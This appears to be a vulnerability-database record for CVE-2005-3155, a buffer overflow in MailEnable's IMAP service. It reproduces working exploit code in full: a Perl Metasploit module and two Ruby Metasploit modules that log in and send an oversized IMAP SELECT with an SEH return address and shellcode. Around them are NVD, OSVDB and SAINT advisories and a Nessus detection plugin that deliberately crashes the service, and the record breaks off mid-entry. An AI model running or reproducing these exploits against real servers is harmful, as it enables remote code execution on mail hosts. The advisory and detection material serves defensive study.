MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
2005-11-20T00:00:00
ID EDB-ID:1332 Type exploitdb Reporter y0 Modified 2005-11-20T00:00:00
Description
MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mailenable_imap_w3c;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'AutoOpts' =>
{
'EXITFUNC' => 'thread',
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'Payload' =>
{
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is not
enabled by default and this exploit requires a valid username
and password to exploit the flaw. MailEnable Professional version
1.6 and prior and MailEnable Enterprise version 1.1 and prior are
affected.
}),
'Refs' =>
[
['BID', 15006],
],
'Targets' =>
[
['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
],
'Keys' => ['imap'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => 25,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("QUIT\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $sploit = "a01 LOGIN $user $pass\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a01 BAD LOGIN-/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow');
my $splat = Pex::Text::AlphaNumText(6196);
$sploit =
"a01 SELECT ". $splat.
"\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
# milw0rm.com [2005-11-20]
{"id": "EDB-ID:1332", "hash": "ace6583b6c0c8f195f6162aba837fb81", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit", "description": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for windows platform", "published": "2005-11-20T00:00:00", "modified": "2005-11-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1332/", "reporter": "y0", "references": [], "cvelist": ["CVE-2005-3155"], "lastseen": "2016-01-31T14:01:23", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3155"]}, {"type": "osvdb", "idList": ["OSVDB:19842"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83006"]}, {"type": "saint", "idList": ["SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "SAINT:E962BB565A40864787B48F196357F83F", "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:16480"]}, {"type": "nessus", "idList": ["MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT"]}], "modified": "2016-01-31T14:01:23"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1332/", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::mailenable_imap_w3c;\nuse strict;\nuse base 'Msf::Exploit';\nuse Msf::Socket::Tcp;\nuse Pex::Text;\n\nmy $advanced = {\n };\n\nmy $info = {\n\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],\n\t'Priv' => 1,\n\t'AutoOpts' =>\n\t {\n\t\t'EXITFUNC' => 'thread',\n\t },\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 143],\n\t\t'USER' => [1, 'DATA', 'IMAP Username'],\n\t\t'PASS' => [1, 'DATA', 'IMAP Password'],\n\n\t },\n\t'Payload' =>\n\t {\n\t\t'Prepend' => \"\\x81\\xec\\x96\\x40\\x00\\x00\\x66\\x81\\xe4\\xf0\\xff\",\n\t\t'Space' => 600,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\t'Description' => Pex::Text::Freeform(qq{\n\t\tThis module exploits a buffer overflow in the W3C logging\n\tfunctionality of the MailEnable IMAPD service. Logging is not\n\tenabled by default and this exploit requires a valid username\n\tand password to exploit the flaw. MailEnable Professional version\n\t1.6 and prior and MailEnable Enterprise version 1.1 and prior are\n\taffected. \n}),\n\t'Refs' =>\n\t [\n\t\t['BID', 15006],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL\n\t ],\n\t'Keys' => ['imap'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n}\n\nsub Check {\n\tmy ($self) = @_;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => 25,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn $self->CheckCode('Connect');\n\t}\n\n\t$s->Send(\"QUIT\\r\\n\");\n\tmy $res = $s->Recv(-1, 20);\n\t$s->Close();\n\n\tif ($res !~ /MailEnable Service, Version: 0-1\\.54/) {\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\n\t\treturn $self->CheckCode('Safe');\n\t}\n\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\n\treturn $self->CheckCode('Detected');\n}\n\nsub Exploit {\n\tmy $self = shift;\n\n\tmy $targetHost = $self->GetVar('RHOST');\n\tmy $targetPort = $self->GetVar('RPORT');\n\tmy $targetIndex = $self->GetVar('TARGET');\n\tmy $user = $self->GetVar('USER');\n\tmy $pass = $self->GetVar('PASS');\n\tmy $encodedPayload = $self->GetVar('EncodedPayload');\n\tmy $shellcode = $encodedPayload->Payload;\n\tmy $target = $self->Targets->[$targetIndex];\n\n\tmy $sock = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $targetHost,\n\t\t'PeerPort' => $targetPort,\n\t );\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Error creating socket: ' . $sock->GetError);\n\t\treturn;\n\t}\n\n\tmy $resp = $sock->Recv(-1);\n\tchomp($resp);\n\t$self->PrintLine('[*] Got Banner: ' . $resp);\n\n\tmy $sploit = \"a01 LOGIN $user $pass\\r\\n\";\n\t$sock->Send($sploit);\n\tmy $resp = $sock->Recv(-1);\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Socket error: ' . $sock->GetError);\n\t\treturn;\n\t}\n\tif($resp !~ /^a01 BAD LOGIN-/) {\n\t\t$self->PrintLine('Login error: ' . $resp);\n\t\treturn;\n\t}\n\t$self->PrintLine('[*] Logged in, sending overflow');\n\n\tmy $splat = Pex::Text::AlphaNumText(6196);\n\t$sploit =\n\t \"a01 SELECT \". $splat.\n\t \"\\xeb\\x06\". pack('V', $target->[1]).\n\t $shellcode. \"\\r\\n\";\n\n\t$sock->Send($sploit);\n\n\tmy $resp = $sock->Recv(-1);\n\tif(length($resp)) {\n\t\t$self->PrintLine('[*] Got response, bad: ' . $resp);\n\t}\n\n\treturn;\n\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "osvdbidlist": ["19842"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2016-09-03T05:51:45", "bulletinFamily": "NVD", "description": "Buffer overflow in the W3C logging for MailEnable Enterprise 1.1 and Professional 1.6 allows remote attackers to execute arbitrary code.", "modified": "2008-09-05T16:53:36", "published": "2005-10-05T19:02:00", "id": "CVE-2005-3155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3155", "title": "CVE-2005-3155", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1014999\n[Secunia Advisory ID:17010](https://secuniaresearch.flexerasoftware.com/advisories/17010/)\nOther Advisory URL: http://www.mailenable.com/hotfix/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0179.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/6Q00M0AEKQ.html\n[CVE-2005-3155](https://vulners.com/cve/CVE-2005-3155)\n", "modified": "2005-10-03T05:17:39", "published": "2005-10-03T05:17:39", "href": "https://vulners.com/osvdb/OSVDB:19842", "id": "OSVDB:19842", "title": "MailEnable W3C Logging Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:09", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83006/MailEnable-IMAPD-W3C-Logging-Buffer-Overflow.html", "id": "PACKETSTORM:83006", "type": "packetstorm", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the W3C logging \nfunctionality of the MailEnable IMAPD service. Logging is \nnot enabled by default and this exploit requires a valid \nusername and password to exploit the flaw. MailEnable \nProfessional version 1.6 and prior and MailEnable Enterprise \nversion 1.1 and prior are affected. \n \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-3155'], \n[ 'OSVDB', '19842'], \n[ 'BID', '15006'], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL \n], \n'DisclosureDate' => '', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \n \nif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_login \n \nbuf = rand_text_alphanumeric(6196, payload_badchars) \nseh = generate_seh_payload(target.ret) \nreq = 'a01 SELECT ' + buf + seh + \"\\r\\n\" \nsock.put(req) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83006/mailenable_w3c_select.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:06:19", "bulletinFamily": "scanner", "description": "The remote host is running a version of MailEnable's IMAP service\nthat is prone to a buffer overflow attack involving its handling of\nW3C logging. An attacker may be able to exploit this to execute\narbitrary code subject to the privileges of the affected application,\ntypically Administrator.", "modified": "2018-11-15T00:00:00", "published": "2005-10-04T00:00:00", "id": "MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19783", "title": "MailEnable IMAP Server W3C Logging Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19783);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2005-3155\");\n script_bugtraq_id(15006);\n\n script_name(english:\"MailEnable IMAP Server W3C Logging Overflow\");\n script_summary(english:\"Checks for logging buffer overflow vulnerability in in MailEnable's IMAP service\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IMAP server is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of MailEnable's IMAP service\nthat is prone to a buffer overflow attack involving its handling of\nW3C logging. An attacker may be able to exploit this to execute\narbitrary code subject to the privileges of the affected application,\ntypically Administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mailenable.com/forum/viewtopic.php?t=8555\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mailenable.com/hotfix/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the 3 October 2005 IMAP Rollup Critical Update/Performance\nImprovement Hotfix referenced in the vendor advisory above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MailEnable IMAPD W3C Logging Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/10/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mailenable:mailenable\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"smtpserver_detect.nasl\", \"imap4_banner.nasl\");\n script_exclude_keys(\"imap/false_imap\");\n script_require_ports(\"Services/smtp\", 25, \"Services/imap\", 143);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nport = get_kb_item(\"Services/imap\");\nif (!port) port = 143;\nif (!get_port_state(port) || get_kb_item(\"imap/false_imap\")) exit(0);\n\n\n# Make sure the banner is for MailEnable.\nbanner = get_imap_banner(port:port);\nif (!banner || \"* OK IMAP4rev1 server ready\" >!< banner) exit(0);\n\n\n# If safe checks are enabled...\nif (safe_checks()) {\n # nb: we'll won't do a banner check unless report_paranoia is \n # set to paranoid since the hotfix doesn't update the banner.\n if (report_paranoia <= 1) exit(0);\n\n # Check the version number from the SMTP server's banner.\n smtp_port = get_kb_item(\"Services/smtp\");\n if (!smtp_port) smtp_port = 25;\n if (!get_port_state(smtp_port)) exit(0);\n if (get_kb_item('SMTP/'+smtp_port+'/broken')) exit(0);\n\n banner = get_smtp_banner(port:smtp_port);\n if (banner =~ \"Mail(Enable| Enable SMTP) Service\") {\n # nb: Standard Edition seems to format version as \"1.71--\" (for 1.71),\n # Professional Edition formats it like \"0-1.2-\" (for 1.2), and\n # Enterprise Edition formats it like \"0--1.1\" (for 1.1).\n ver = eregmatch(\n pattern:\"Version: (0-+)?([0-9][^- ]+)-*\",\n string:banner,\n icase:TRUE\n );\n if (ver == NULL) {\n exit(1, \"cannot determine version of MailEnable's SMTP connector service\");\n }\n if (ver[1] == NULL) {\n edition = \"Standard\";\n }\n else if (ver[1] == \"0-\") {\n edition = \"Professional\";\n }\n else if (ver[1] == \"0--\") {\n edition = \"Enterprise\";\n }\n if (isnull(edition)) {\n exit(1, \"cannot determine edition of MailEnable's SMTP connector service!\");\n }\n ver = ver[2];\n\n if (\n # nb: Professional versions <= 1.6 may be vulnerable.\n (edition == \"Professional\" && ver =~ \"^1\\.([0-5]|6$)\") ||\n # nb: Enterprise versions <= 1.2 may be vulnerable.\n (edition == \"Enterprise\" && ver =~ \"^1\\.(0|1$)\")\n ) {\n w = string(\n \"***** Nessus has determined the vulnerability exists on the remote\\n\",\n \"***** host simply by looking at the version number of Mailenable\\n\",\n \"***** installed there. Since the Hotfix does not change the version\\n\",\n \"***** number, though, this might be a false positive.\\n\");\n security_hole(port:port, extra: w);\n }\n }\n exit(0);\n}\n# Otherwise, try to exploit it.\nelse {\n # Establish a connection.\n tag = 0;\n soc = open_sock_tcp(port);\n if (!soc) exit(0);\n\n # Read banner.\n s = recv_line(socket:soc, length:1024);\n if (!strlen(s)) {\n close(soc);\n exit(0);\n }\n\n # Try to exploit the flaw.\n #\n # nb: a vulnerable server will respond with a bad command and die after a few seconds.\n ++tag;\n c = string(\"nessus\", string(tag), \" SELECT \", crap(6800));\n send(socket:soc, data:string(c, \"\\r\\n\"));\n close(soc);\n sleep(5);\n\n # Try to reestablish a connection and read the banner.\n soc2 = open_sock_tcp(port);\n if (soc2) s2 = recv_line(socket:soc2, length:1024);\n\n # There's a problem if we couldn't establish the connection or read the banner.\n if (!soc2 || !strlen(s2)) {\n security_hole(port);\n exit(0);\n }\n close(soc2);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:E962BB565A40864787B48F196357F83F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:57:45", "bulletinFamily": "exploit", "description": "MailEnable IMAPD W3C Logging Buffer Overflow. CVE-2005-3155. Remote exploit for windows platform", "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "EDB-ID:16480", "href": "https://www.exploit-db.com/exploits/16480/", "type": "exploitdb", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\r\n# $Id: mailenable_w3c_select.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\r\n\t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\r\n\t\t\t\tnot enabled by default and this exploit requires a valid\r\n\t\t\t\tusername and password to exploit the flaw. MailEnable\r\n\t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\r\n\t\t\t\tversion 1.1 and prior are affected.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-3155'],\r\n\t\t\t\t\t[ 'OSVDB', '19842'],\r\n\t\t\t\t\t[ 'BID', '15006'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 03 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\r\n\t\tif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_login\r\n\r\n\t\tbuf = rand_text_alphanumeric(6196, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\treq = 'a01 SELECT ' + buf + seh + \"\\r\\n\"\r\n\t\tsock.put(req)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16480/"}], "metasploit": [{"lastseen": "2019-02-15T16:56:41", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T05:00:27", "id": "MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT", "href": "", "type": "metasploit", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: 